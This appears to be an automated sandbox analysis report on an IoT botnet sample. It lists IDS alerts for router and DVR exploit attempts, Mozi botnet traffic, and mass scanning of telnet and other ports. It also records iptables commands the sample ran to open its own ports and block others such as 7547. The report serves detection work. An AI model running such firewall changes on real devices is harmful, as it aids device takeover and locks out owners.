Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57756 -> 164.132.95.120:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 60.240.241.20: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.127.187:8082 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 151.63.180.12: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59000 -> 46.249.83.253:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.91.249: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:58488 -> 185.94.99.39:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42192 -> 187.146.119.198:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.134: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38376 -> 186.153.124.66:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.236.31.232: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43254 -> 123.110.194.55:80
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 133.67.251.2: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.180.30: -> 192.168.2.20:
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59308 -> 124.71.40.210:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.17.18.122: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33820 -> 13.109.201.46:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:44576 -> 154.210.25.254:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54110 -> 114.34.159.229:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.50.122.98: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50886 -> 154.3.84.96:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49172 -> 59.151.23.11:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 2.206.33.227: -> 192.168.2.20:
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 185.229.189.17: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:52244 -> 89.129.183.215:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.117.122:8082 -> 192.168.2.20:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56522 -> 83.151.238.20:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.160.123: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60358 -> 166.88.13.234:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 88.75.23.254: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36846 -> 188.106.17.156:80
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 134.106.144.216: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.109.232.198: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49468 -> 104.94.83.241:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:47256 -> 204.232.228.51:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.83.241:80 -> 192.168.2.20:49468
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36234 -> 104.24.17.66:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52176 -> 194.76.32.64:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56082 -> 154.92.39.203:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:41890 -> 118.48.130.177:8080
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33196 -> 185.36.171.129:80
Connects to many ports of the same IP (likely port scanning)
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4638) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4672) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4679) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4720) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
Source: /bin/sh (PID: 4732) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4755) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4763) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
Source: /bin/sh (PID: 4785) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
Source: /bin/sh (PID: 4815) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4819) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4838) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4866) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4896) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4915) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4939) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4966) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4986) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4992) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5015) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5042) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5063) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5071) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5095) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5119) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5139) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5158) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5167) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5194) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
Source: /bin/sh (PID: 5215) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5229) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
Source: /bin/sh (PID: 5253) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
Source: /bin/sh (PID: 5265) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 54390
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.61.31.17:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 63.253.84.254:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.185.251.149:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 8.92.251.48:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 211.32.153.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 203.0.21.109:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 72.221.8.246:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 202.213.206.179:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 35.117.35.167:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 151.194.99.188:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.103.236.147:2323
Source: global traffic TCP traffic: 192.168.2.20:36064 -> 47.145.217.113:5555
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.219.62.189:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.123.155.195:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 76.92.182.82:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 36.33.205.198:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 38.157.124.234:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 58.155.188.76:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 113.44.78.247:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 97.68.83.8:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 121.99.87.167:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 87.22.241.41:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 178.95.227.170:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 118.211.78.213:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 151.87.97.55:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.66.123.242:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.255.154.108:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 176.242.102.183:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 146.35.33.184:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 65.77.77.241:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 219.122.59.104:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 101.118.160.184:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.54.132.55:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 175.223.210.199:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 191.15.46.25:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 168.145.68.126:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 38.29.8.84:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 84.255.39.9:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 175.61.243.196:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 100.134.61.27:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 217.93.0.20:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 79.65.71.65:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 20.167.158.223:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 74.118.105.34:2323
Source: global traffic TCP traffic: 192.168.2.20:42434 -> 187.254.232.94:8443
Source: global traffic TCP traffic: 192.168.2.20:43764 -> 207.11.230.122:8080
Source: global traffic TCP traffic: 192.168.2.20:48034 -> 19.134.158.13:8080
Source: global traffic TCP traffic: 192.168.2.20:48348 -> 44.61.11.55:8080
Source: global traffic TCP traffic: 192.168.2.20:48496 -> 178.113.43.27:7574
Source: global traffic TCP traffic: 192.168.2.20:50444 -> 123.219.44.5:81
Source: global traffic TCP traffic: 192.168.2.20:48516 -> 89.233.76.116:8080
Source: global traffic TCP traffic: 192.168.2.20:39274 -> 149.212.141.67:52869
Source: global traffic TCP traffic: 192.168.2.20:50534 -> 211.137.192.96:8080
Source: global traffic TCP traffic: 192.168.2.20:59440 -> 88.201.76.34:7574
Source: global traffic TCP traffic: 192.168.2.20:53588 -> 79.165.147.138:5555
Source: global traffic TCP traffic: 192.168.2.20:35806 -> 37.229.199.107:8443
Source: global traffic TCP traffic: 192.168.2.20:60106 -> 190.174.62.228:7574
Source: global traffic TCP traffic: 192.168.2.20:54834 -> 40.19.224.212:8080
Source: global traffic TCP traffic: 192.168.2.20:59008 -> 196.13.229.215:52869
Source: global traffic TCP traffic: 192.168.2.20:36360 -> 101.193.149.11:81
Source: global traffic TCP traffic: 192.168.2.20:50182 -> 148.157.191.210:49152
Source: global traffic TCP traffic: 192.168.2.20:36990 -> 146.151.247.1:52869
Source: global traffic TCP traffic: 192.168.2.20:37184 -> 173.191.56.106:8080
Source: global traffic TCP traffic: 192.168.2.20:46266 -> 214.0.104.172:52869
Source: global traffic TCP traffic: 192.168.2.20:60148 -> 206.34.195.249:81
Source: global traffic TCP traffic: 192.168.2.20:41632 -> 134.240.237.208:8443
Source: global traffic TCP traffic: 192.168.2.20:50748 -> 221.163.252.68:7574
Source: global traffic TCP traffic: 192.168.2.20:56358 -> 13.176.53.86:52869
Source: global traffic TCP traffic: 192.168.2.20:56030 -> 152.180.2.14:8080
Source: global traffic TCP traffic: 192.168.2.20:34140 -> 3.184.34.149:8443
Source: global traffic TCP traffic: 192.168.2.20:57666 -> 171.141.124.240:8443
Source: global traffic TCP traffic: 192.168.2.20:42454 -> 89.125.164.152:52869
Source: global traffic TCP traffic: 192.168.2.20:49348 -> 193.121.216.28:8080
Source: global traffic TCP traffic: 192.168.2.20:49216 -> 164.154.93.195:8080
Source: global traffic TCP traffic: 192.168.2.20:42866 -> 222.34.74.234:8080
Source: global traffic TCP traffic: 192.168.2.20:36006 -> 18.247.152.131:5555
Source: global traffic TCP traffic: 192.168.2.20:47312 -> 204.170.101.0:37215
Source: global traffic TCP traffic: 192.168.2.20:34394 -> 5.230.135.152:37215
Source: global traffic TCP traffic: 192.168.2.20:39916 -> 118.110.234.130:7574
Source: global traffic TCP traffic: 192.168.2.20:33904 -> 122.25.166.83:52869
Source: global traffic TCP traffic: 192.168.2.20:45598 -> 45.204.245.109:49152
Source: global traffic TCP traffic: 192.168.2.20:56044 -> 147.133.242.76:8080
Source: global traffic TCP traffic: 192.168.2.20:59490 -> 19.118.124.110:7574
Source: global traffic TCP traffic: 192.168.2.20:42346 -> 132.139.233.175:37215
Source: global traffic TCP traffic: 192.168.2.20:59948 -> 117.21.87.201:7574
Source: global traffic TCP traffic: 192.168.2.20:58880 -> 6.243.236.18:8080
Source: global traffic TCP traffic: 192.168.2.20:45762 -> 3.67.142.9:5555
Source: global traffic TCP traffic: 192.168.2.20:41018 -> 70.33.99.104:5555
Source: global traffic TCP traffic: 192.168.2.20:42532 -> 152.100.167.36:8443
Source: global traffic TCP traffic: 192.168.2.20:32890 -> 58.12.204.60:8080
Source: global traffic TCP traffic: 192.168.2.20:32780 -> 4.2.179.224:81
Source: global traffic TCP traffic: 192.168.2.20:54140 -> 196.106.27.28:81
Source: global traffic TCP traffic: 192.168.2.20:52696 -> 123.224.23.253:8080
Source: global traffic TCP traffic: 192.168.2.20:36056 -> 22.193.177.229:52869
Source: global traffic TCP traffic: 192.168.2.20:52546 -> 93.204.44.191:8443
Source: global traffic TCP traffic: 192.168.2.20:51248 -> 35.83.92.160:5555
Source: global traffic TCP traffic: 192.168.2.20:39020 -> 204.121.33.136:49152
Source: global traffic TCP traffic: 192.168.2.20:58310 -> 175.140.231.185:8080
Source: global traffic TCP traffic: 192.168.2.20:39544 -> 133.59.219.177:49152
Source: global traffic TCP traffic: 192.168.2.20:52212 -> 43.25.44.12:7574
Source: global traffic TCP traffic: 192.168.2.20:41908 -> 209.121.184.1:49152
Source: global traffic TCP traffic: 192.168.2.20:53734 -> 219.159.206.231:49152
Source: global traffic TCP traffic: 192.168.2.20:47382 -> 143.190.192.234:81
Source: global traffic TCP traffic: 192.168.2.20:43158 -> 160.205.73.207:5555
Source: global traffic TCP traffic: 192.168.2.20:32832 -> 117.175.62.17:52869
Source: global traffic TCP traffic: 192.168.2.20:43804 -> 180.27.20.9:8443
Source: global traffic TCP traffic: 192.168.2.20:48400 -> 79.46.53.90:5555
Source: global traffic TCP traffic: 192.168.2.20:51920 -> 170.153.165.207:37215
Source: global traffic TCP traffic: 192.168.2.20:52388 -> 25.120.108.166:37215
Source: global traffic TCP traffic: 192.168.2.20:38936 -> 88.143.113.184:37215
Source: global traffic TCP traffic: 192.168.2.20:43268 -> 15.35.59.131:8080
Source: global traffic TCP traffic: 192.168.2.20:44336 -> 44.140.107.144:37215
Source: global traffic TCP traffic: 192.168.2.20:40376 -> 106.57.104.27:8080
Source: global traffic TCP traffic: 192.168.2.20:37816 -> 119.44.94.32:8080
Source: global traffic TCP traffic: 192.168.2.20:58936 -> 222.91.171.102:5555
Source: global traffic TCP traffic: 192.168.2.20:50526 -> 152.99.103.175:81
Source: global traffic TCP traffic: 192.168.2.20:35450 -> 168.17.134.196:8080
Source: global traffic TCP traffic: 192.168.2.20:51626 -> 197.177.18.211:8080
Source: global traffic TCP traffic: 192.168.2.20:56636 -> 196.83.210.30:8443
Source: global traffic TCP traffic: 192.168.2.20:38300 -> 185.155.197.240:81
Source: global traffic TCP traffic: 192.168.2.20:33164 -> 121.26.58.85:49152
Source: global traffic TCP traffic: 192.168.2.20:56170 -> 164.150.9.40:7574
Source: global traffic TCP traffic: 192.168.2.20:39376 -> 51.12.46.124:5555
Source: global traffic TCP traffic: 192.168.2.20:48264 -> 121.149.137.245:8080
Source: global traffic TCP traffic: 192.168.2.20:42412 -> 2.93.191.137:8080
Source: global traffic TCP traffic: 192.168.2.20:41438 -> 189.120.2.56:81
Source: global traffic TCP traffic: 192.168.2.20:50726 -> 177.173.185.50:5555
Source: global traffic TCP traffic: 192.168.2.20:48968 -> 43.219.247.168:7574
Source: global traffic TCP traffic: 192.168.2.20:54234 -> 91.65.28.188:8080
Source: global traffic TCP traffic: 192.168.2.20:51310 -> 177.152.69.68:81
Source: global traffic TCP traffic: 192.168.2.20:52066 -> 65.70.118.43:8080
Source: global traffic TCP traffic: 192.168.2.20:45870 -> 188.24.124.134:49152
Source: global traffic TCP traffic: 192.168.2.20:60646 -> 166.82.7.224:7574
Source: global traffic TCP traffic: 192.168.2.20:42804 -> 217.94.12.32:81
Source: global traffic TCP traffic: 192.168.2.20:45324 -> 31.15.157.79:8080
Source: global traffic TCP traffic: 192.168.2.20:37168 -> 167.68.166.142:8080
Source: global traffic TCP traffic: 192.168.2.20:44994 -> 179.125.55.171:49152
Source: global traffic TCP traffic: 192.168.2.20:53832 -> 212.136.201.1:8080
Source: global traffic TCP traffic: 192.168.2.20:54182 -> 88.151.118.122:49152
Source: global traffic TCP traffic: 192.168.2.20:55594 -> 20.188.249.215:5555
Source: global traffic TCP traffic: 192.168.2.20:51284 -> 29.173.93.82:5555
Source: global traffic TCP traffic: 192.168.2.20:53790 -> 41.225.3.47:8080
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 53.150.184.227:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 66.51.200.37:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 181.150.246.6:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 86.87.169.9:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 135.159.46.50:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.122.5.245:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 101.175.97.186:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 201.16.210.127:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 150.231.221.134:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 165.27.212.212:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 35.145.36.100:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 184.123.210.115:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 84.139.204.146:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.20.165.119:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 90.245.89.183:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 102.40.194.39:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 117.110.44.183:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.84.203.177:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 145.127.164.51:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 212.60.191.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 46.92.49.206:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 90.60.92.48:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 164.125.182.98:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 210.11.149.99:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 68.213.132.158:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.141.207.185:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.36.151.108:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 99.148.128.207:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 188.2.194.211:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 27.247.199.146:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 148.17.145.65:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 145.224.134.187:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 17.179.66.133:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 94.136.154.153:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 195.153.115.31:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 82.26.125.94:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 148.166.250.32:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 73.60.149.25:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 73.38.107.147:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 46.69.94.69:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 206.45.246.151:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 89.207.33.190:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 211.121.235.206:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 81.181.240.162:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.141.143.27:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 37.126.181.96:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 111.71.34.120:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.70.240.234:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 71.90.204.120:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 169.164.54.25:2323
Source: global traffic TCP traffic: 192.168.2.20:32898 -> 54.217.177.252:8080
Source: global traffic TCP traffic: 192.168.2.20:51920 -> 91.128.122.128:7574
Source: global traffic TCP traffic: 192.168.2.20:54630 -> 83.158.11.78:8080
Source: global traffic TCP traffic: 192.168.2.20:50738 -> 219.170.242.188:37215
Source: global traffic TCP traffic: 192.168.2.20:39524 -> 79.209.77.202:49152
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 187.201.188.204:1023
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.40.116.98:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 118.148.44.14:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 5.203.164.245:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 162.139.86.71:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 209.174.66.76:2323
Source: global traffic TCP traffic: 192.168.2.20:15042 -> 166.38.89.126:2323
